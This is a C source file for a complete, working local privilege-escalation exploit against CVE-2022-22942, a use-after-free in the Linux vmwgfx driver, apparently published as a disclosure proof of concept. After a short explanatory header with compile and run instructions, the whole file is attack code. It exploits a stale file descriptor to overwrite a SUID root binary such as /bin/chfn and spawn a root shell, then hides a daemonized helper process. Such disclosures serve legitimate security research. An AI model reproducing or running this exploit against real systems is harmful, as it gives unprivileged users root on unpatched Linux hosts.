/* The vmwgfx driver has a similar bug as the one we fixed last year in the
 * nitro enclaves code (https://git.kernel.org/linus/f1ce3986baa6
 * "nitro_enclaves: Fix stale file descriptors on failed usercopy").
 *
 * If the driver fails to copy the 'fence_rep' object to userland, it tries to
 * recover by deallocating the (already populated) file descriptor. This is
 * wrong, as the fd gets released via put_unused_fd() which shouldn't be used,
 * as the fd table slot was already populated via the previous call to
 * fd_install(). This leaves userland with a valid fd table entry pointing to
 * a free'd 'file' object.
 *
 * There are multiple ways to exploit this bug. A previous version of this PoC
 * dumped the contents of /etc/shadow. This one overwrites a SUID root binary
 * to pop a shell.
 *
 * Compile as:
 *   $ gcc -O2 cve-2022-22942-dc.c -o cve-2022-22942-dc
 *
 * Run as (and wait for the root shell to appear):
 *   $ ./cve-2022-22942-dc [target_file [temp_file [dev_node]]]
 *
 * Remarks:
 *
 * This POC assumes it has access to '/dev/dri/card0' which likely means the
 * calling user needs to be part of the 'video' group.
 *
 * Alternatively '/dev/dri/renderD128' can be used (just pass the path as
 * argument to ./cve-2022-22942-dc-dc), which, under Debian, means being part
 * of the 'render' group.
 *
 * This bug was fixed by commit a0f90c881570 ("drm/vmwgfx: Fix stale file
 * descriptors on failed usercopy"). It affected kernel versions v4.14-rc1 to
 * v5.17-rc1.
 *
 * This is CVE-2022-22942.
 *
 * (c) 2022 Open Source Security, Inc.
 *
 * - minipli
 *
 *  This program is free software; you can redistribute it and/or modify
 *  it under the terms of the GNU General Public License as published by
 *  the Free Software Foundation; either version 2 of the License, or
 *  (at your option) any later version.
 *
 *  This program is distributed in the hope that it will be useful,
 *  but WITHOUT ANY WARRANTY; without even the implied warranty of
 *  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 *  GNU General Public License for more details.
 *
 *  You should have received a copy of the GNU General Public License
 *  along with this program; if not, write to the Free Software
 *  Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 */

#define _GNU_SOURCE
#include <sys/sysmacros.h>
#include <sys/types.h>
#include <sys/ioctl.h>
#include <sys/prctl.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <sys/mman.h>
#include <unistd.h>
#include <stdbool.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <signal.h>
#include <errno.h>
#include <fcntl.h>
#include <sched.h>
#include <stdio.h>
#include <err.h>

/* uapi/drm/drm.h */
#define DRM_IOCTL_BASE		'd'
#define DRM_IOW(nr,type)	_IOW(DRM_IOCTL_BASE,nr,type)
#define DRM_IOWR(nr,type)	_IOWR(DRM_IOCTL_BASE,nr,type)
#define DRM_COMMAND_BASE	0x40

#define DRM_IOCTL_VERSION	DRM_IOWR(0x00, struct drm_version)
struct drm_version {
	int version_major;
	int version_minor;
	int version_patchlevel;
	size_t name_len;
	char *name;
	size_t date_len;
	char *date;
	size_t desc_len;
	char *desc;
};

/* uapi/drm/vmwgfx_drm.h */
#define DRM_VMW_EXECBUF							12
#define DRM_VMW_EXECBUF_VERSION					2
#define DRM_VMW_EXECBUF_FLAG_EXPORT_FENCE_FD	(1 << 1)
#define DRM_VMW_INVALID_CTX_HNDL				(-1)

#define DRM_IOCTL_VMW_EXECBUF \
	 DRM_IOW(DRM_COMMAND_BASE + DRM_VMW_EXECBUF, struct drm_vmw_execbuf_arg)
struct drm_vmw_execbuf_arg {
	uint64_t commands;
	uint32_t command_size;
	uint32_t throttle_us;
	uint64_t fence_rep;
	uint32_t version;
	uint32_t flags;
	uint32_t context_handle;
	int32_t imported_fence_fd;
};

#define array_size(x)	(sizeof(x)/sizeof*(x))

#define FENCE_REP_PTR		0x42
#define VMWGFX_DRV_NAME		"vmwgfx"
#define VMWGFX_DEV			"/dev/dri/card0"
#define NULL_DEV			"/dev/null"
#define SUID_TARGET			"/bin/chfn"	// use /bin/chage for RHEL/CentOS
#define TEMP_FILE			"/var/tmp/cake"

static char *suid_path = SUID_TARGET;
static char *temp_path = TEMP_FILE;
static char *dev_path = VMWGFX_DEV;
static char stale_fd_path[64];

static const void *prog_addr, *suid_addr;
static size_t prog_size, suid_size;

#define NUM_FILES 32
static int files[NUM_FILES];

static void open_files(const char *path, int flags, mode_t mode, bool temp) {
	unsigned int i;

	for (i = 0; i < array_size(files); i++) {
		files[i] = open(path, flags, mode);
		if (files[i] < 0)
			err(1, "open('%s', %hx, %hx)", path, flags, mode);

		if (temp) {
			unlink(path);

			if (ftruncate(files[i], prog_size))
				err(1, "ftruncate()");
		}
	}
}

static void close_files(unsigned int except) {
	unsigned int i;

	for (i = 0; i < array_size(files); i++) {
		if ((unsigned int)files[i] == except)
			continue;

		if (close(files[i]))
			err(1, "close(fd=%d)", files[i]);
	}
}

static int find_file(ino_t ino) {
	struct stat buf;
	unsigned int i;

	for (i = 0; i < array_size(files); i++) {
		if (fstat(files[i], &buf))
			err(1, "stat(fd=%d)", files[i]);

		if (buf.st_ino == ino)
			return files[i];
	}

	return -1;
}

static bool is_suid(const char *path) {
	struct stat buf;

	if (stat(path, &buf))
		return false;

	return buf.st_uid == 0 && (buf.st_mode & 04111) == 04111;
}

static bool pin_cpu(int cpu) {
    cpu_set_t cpus;

    CPU_ZERO(&cpus);
    CPU_SET(cpu, &cpus);

    return !!sched_setaffinity(0, sizeof(cpus), &cpus);
}

static void *map_file(const char *path, size_t *len) {
	struct stat sb;
	void *addr;
	size_t i;
	int fd;

	printf("[~] creating r/o mapping of %s...\n", path);
	fd = open(path, O_RDONLY);
	if (fd < 0)
		err(1, "open(%s)", path);

	if (fstat(fd, &sb))
		err(1, "stat(%s)", path);

	*len = sb.st_size;
	addr = mmap(NULL, *len, PROT_READ, MAP_SHARED, fd, 0);
	if (addr == MAP_FAILED)
		err(1, "mmap(%s)", path);

	/* fault in the pages to pre-load the binary */
	for (i = 0; i < *len; i += 4096)
		*(volatile char *)(addr + i);

	close(fd);

	return addr;
}

static int get_stale_fd(const char *dev_path) {
	static char name[256], date[256], desc[256];
	static struct drm_version drm_info = {
		.name = name, .name_len = sizeof(name),
		.desc = desc, .desc_len = sizeof(desc),
		.date = date, .date_len = sizeof(date),
	};
	static struct drm_vmw_execbuf_arg exec_buf = {
		.version = DRM_VMW_EXECBUF_VERSION,
		.context_handle = DRM_VMW_INVALID_CTX_HNDL,
		.flags = DRM_VMW_EXECBUF_FLAG_EXPORT_FENCE_FD,
		.fence_rep = FENCE_REP_PTR,
	};
	static int vmw_fd = -1;
	int fd;

	if (vmw_fd < 0) {
		printf("[~] vmwgfx setup using %s...\n", dev_path);
		vmw_fd = open(dev_path, O_WRONLY);
		if (vmw_fd < 0)
			err(1, "open(%s)", dev_path);

		if (ioctl(vmw_fd, DRM_IOCTL_VERSION, &drm_info) != 0)
			err(1, "ioctl(DRM_IOCTL_VERSION) unexpectedly failed");

		if (strcmp(drm_info.name, VMWGFX_DRV_NAME) != 0) {
			errx(1, "wrong driver, should be '%s' but is '%s'",
			     VMWGFX_DRV_NAME, drm_info.name);
		}
		printf("[+] confirmed to be targeting the right driver\n");
	}

	fd = open(NULL_DEV, O_RDONLY);
	if (fd < 0)
		err(1, "open(%s)", NULL_DEV);
	close(fd);
	printf("[~] predicted fence fd = %d\n", fd);
	snprintf(stale_fd_path, sizeof(stale_fd_path), "/proc/self/fd/%d", fd);

	printf("[~] triggering fence fd export...\n");
	if (ioctl(vmw_fd, DRM_IOCTL_VMW_EXECBUF, &exec_buf) != 0)
		err(1, "ioctl(DRM_IOCTL_VMW_EXECBUF) unexpectedly failed");

	return fd;
}

static bool check_fd(int fd, const char *path, ino_t *ino) {
	char buf[1024];
	struct stat sb;
	ssize_t len;

	/* Do non-faulting checks first -- using an invalid address ;) */
	errno = 0;
	if (write(fd, (void *)~0xdead, 42) >= 0 || errno != EFAULT)
		return false;

	/* We open the file with exactly these flags */
	if ((fcntl(fd, F_GETFL) & O_RDWR) != O_RDWR)
		return false;

	len = readlink(stale_fd_path, buf, sizeof(buf) - 1);
	if (len < 0)
		return false;

	buf[len] = '\0';
	if (strncmp(buf, path, strlen(path)) != 0)
		return false;

	if (fstat(fd, &sb) != 0)
		return false;

	*ino = sb.st_ino;

	return true;
}

static void __read_pipe(int fd, void *buf, size_t len, const char *what, const char *caller) {
	ssize_t cnt;

	cnt = read(fd, buf, len);
	if (cnt < 0)
		err(1, "%s: read(%s)", caller, what);

	if (cnt == 0)
		errx(2, "%s: read(%s) EOF, other side died?", caller, what);

	if ((size_t)cnt != len)
		errx(1, "%s: short read(%s): got %zd, want %zu", caller, what, cnt, len);
}
#define read_pipe(p,o)	__read_pipe(p[0], &o, sizeof(o), #o, __func__)

static void __write_pipe(int fd, const void *buf, size_t len, const char *what, const char *caller) {
	ssize_t cnt;

	cnt = write(fd, buf, len);
	if (cnt < 0)
		err(1, "%s: write(%s)", caller, what);

	if (cnt == 0)
		errx(2, "%s: write(%s) EOF, other side died?", caller, what);

	if ((size_t)cnt != len)
		errx(1, "%s: short write(%s): got %zd, want %zu", caller, what, cnt, len);
}
#define write_pipe(p,o)	__write_pipe(p[1], &o, sizeof(o), #o, __func__)

static void stale_fd_worker(int pipe[2]) {
	bool write_ino = false;
	int stale_fd = -1;
	char state = '0';
	ino_t ino;

	do {
		switch (state) {
			case '0':
				stale_fd = get_stale_fd(dev_path);
				/* ensure an RCU GP has passed and the file was returned to the cache */
//				usleep(150 * 1000);
				sleep(1);
				printf("[~] RCU GP passed and file object released -- by now or soon!\n");
				state++;
				break;

			case '2':
				printf("[~] probing stale fd for a match...\n");
				if (check_fd(stale_fd, temp_path, &ino)) {
					write_ino = true;
					state++;
				} else {
					state--;
				}
				break;

			case '4':
				printf("[~] closing stale fd...\n");
				/* This close will drop the reference of the mmap() of stage
				 * '3' and make its file pointer dangling.
				 */
				close(stale_fd);

				/* ensure an RCU GP has passed and the file was released to the cache */
//				usleep(150 * 1000);
				sleep(1);
				printf("[~] RCU GP passed and file object released again -- hopefully!\n");
				state++;
				break;

			default:
				errx(1, "%s: invalid state '%c'", __func__, state);
		}

		write_pipe(pipe, state);
		if (write_ino) {
			write_ino = false;
			write_pipe(pipe, ino);
		}
		read_pipe(pipe, state);
	} while (state < '6');

	printf("[~] %s: done\n", __func__);
	exit(memcmp(suid_addr, prog_addr, prog_size));
}

static void mmap_worker(int pipe[2]) {
	bool files_open = false;
	void *addr = NULL;
	sigset_t set;
	char state;
	ino_t ino;
	int fd;

	do {
		read_pipe(pipe, state);

		switch (state) {
			case '1':
				if (files_open) {
					files_open = false;
					close_files(-1);
					usleep(20 * 1000);
				}
				printf("[~] opening some r/w files for %s\n", temp_path);
				open_files(temp_path, O_RDWR | O_CREAT | O_TRUNC, 0600, true);
				files_open = true;
				state++;
				break;

			case '3':
				/* found it! */
				read_pipe(pipe, ino);

				fd = find_file(ino);
				if (fd < 0) {
					printf("[-] failed to find candidate with ino %#lx, retrying\n", ino);
					state = '1';
					/* no need to bounce, retry directly */
					continue;
				}

				printf("[+] found match at fd %d\n", fd);
				close_files(fd);

				printf("[~] creating r/w mapping...\n");
				addr = mmap(NULL, prog_size, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);
				if (addr == MAP_FAILED)
					err(1, "mmap()");

				close(fd);
				state++;
				break;

			case '5':
				printf("[~] opening some r/o files for %s\n", suid_path);
				open_files(suid_path, O_RDONLY, 0, false);

				/* We hope to have reallocated the dangling file once more! */
				printf("[*] trying to overwrite code in %s\n", suid_path);
				memcpy(addr, prog_addr, prog_size);
				//msync(addr, prog_size, MS_SYNC | MS_INVALIDATE);
				printf("[~] %s: done\n", __func__);
				state++;
				break;

			default:
				errx(1, "%s: invalid state '%c'", __func__, state);
		}

		write_pipe(pipe, state);
	} while (state < '6');

	/* The 'addr' mapping is using a dangling file pointer, i.e. one with an
	 * off-by-one reference count. Terminating the process will thereby lead to
	 * a warning in the vfs code: "VFS: Close: file count is 0" or worse,
	 * tripping over DEBUG_LIST checks leading to an Oops.
	 *
	 * To avoid these, turn into a ghost, detach from the process hierachy and
	 * daemonize.
	 */
	//exit(memcmp(suid_addr, prog_addr, prog_size));

	setsid();

	close(0);
	close(1);
	close(2);
	close(pipe[0]);
	close(pipe[1]);
	prctl(PR_SET_NAME, "bogeyman", 0, 0, 0);

    sigfillset(&set);
    sigprocmask(SIG_BLOCK, &set, NULL);

	for (;;)
		pause();
}

static void spawn_worker(void) {
	int state_fd[2][2];

	if (pipe(state_fd[0]) < 0 || pipe(state_fd[1]) < 0)
		err(1, "pipe()");

	switch (fork()) {
		default:
			close(state_fd[0][1]);
			close(state_fd[1][0]);
			stale_fd_worker((int [2]) { state_fd[0][0], state_fd[1][1] });
			break;

		case 0:
			close(state_fd[0][0]);
			close(state_fd[1][1]);
			mmap_worker((int [2]) { state_fd[1][0], state_fd[0][1] });
			break;

		case -1:
			err(1, "fork()");
	}

	/* not reached */
	exit(1);
}

int main(int argc, char **argv) {
	static const char proc_self_exe[] = "/proc/self/exe";

	if (!getuid())
		errx(1, "ahem...");

	if (!geteuid()) {
		setuid(0);
		setgid(0);
		execve("/bin/sh", (char *const []){ "-sh", NULL }, NULL);
		err(1, "execve(%s)", SUID_TARGET);
	}

	if (argc >= 2)
	    suid_path = argv[1];

	if (argc >= 3)
	    temp_path = argv[2];

	if (argc >= 4)
	    dev_path = argv[3];

	if (!is_suid(suid_path))
		errx(1, "%s isn't suid root, choose another target", suid_path);

	suid_addr = map_file(suid_path, &suid_size);
	prog_addr = map_file(proc_self_exe, &prog_size);

	if (suid_size < prog_size) {
		errx(1, "size of %s too small, need %zuB, but only have %zuB",
		     suid_path, prog_size, suid_size);
	}

	/* Ensure all subprocesses share the same SLUB's partial lists */
	if (pin_cpu(sched_getcpu()))
        err(1, "failed to pin to CPU");

	/* Span two subprocesses that lock step a state machine:
	 * P1: triggers the bug to get a stale fd entry
	 *
	 * P2: opens a bunch of r/w temporary files to reallocate the file object
	 *
	 * P1: checks if one of the fds reallocated the dangling file pointer and
	 *     signals P2 which
	 *
	 * P2: creates a r/w mapping of the fd that matches the reallocated file
	 *     pointer and closes all opened files
	 *
	 * P1: uses its stale fd entry to put the file attached to P2's mapping to
	 *     make it dangling again
	 *
	 * P2: opens the target file r/o multiple times to reallocate the just
	 *     released file object
	 * P2: copies this program over the previously created mapping (now
	 *     pointing to the victim file instead of the temporary file)
	 *
	 * P1: signals success / failure to the observer by checking if the victim
	 *     file was overwritten
	 *
	 * Wait for them to exit / die and check the return status. If it's zero,
	 * terminate the loop, we're done.
	 */

	/* Do the dirty work in subprocesses, to not accidentally die along */
	printf("[~] spawning helper processes...\n");
	switch (fork()) {
		case -1: err(1, "fork()");
		case  0: spawn_worker();
	}

retry:	/* Reap all the zombies... */
	switch (wait(NULL)) {
		case -1:
			switch (errno) {
				case EINTR: goto retry;
				case ECHILD: break;
				default: err(1, "wait()");
			}
			break;
		default:
			/* continue reaping... */
			goto retry;
	}

	if (memcmp(suid_addr, prog_addr, prog_size))
		errx(1, "failed to overwrite %s :(", suid_path);

	printf("[$] success, spawning shell...\n");

	/* Should be a suid root version of us by now */
	execve(suid_path, (char *const []){ suid_path, NULL }, NULL);
	err(1, "execve(%s)", suid_path);

	return 0;
}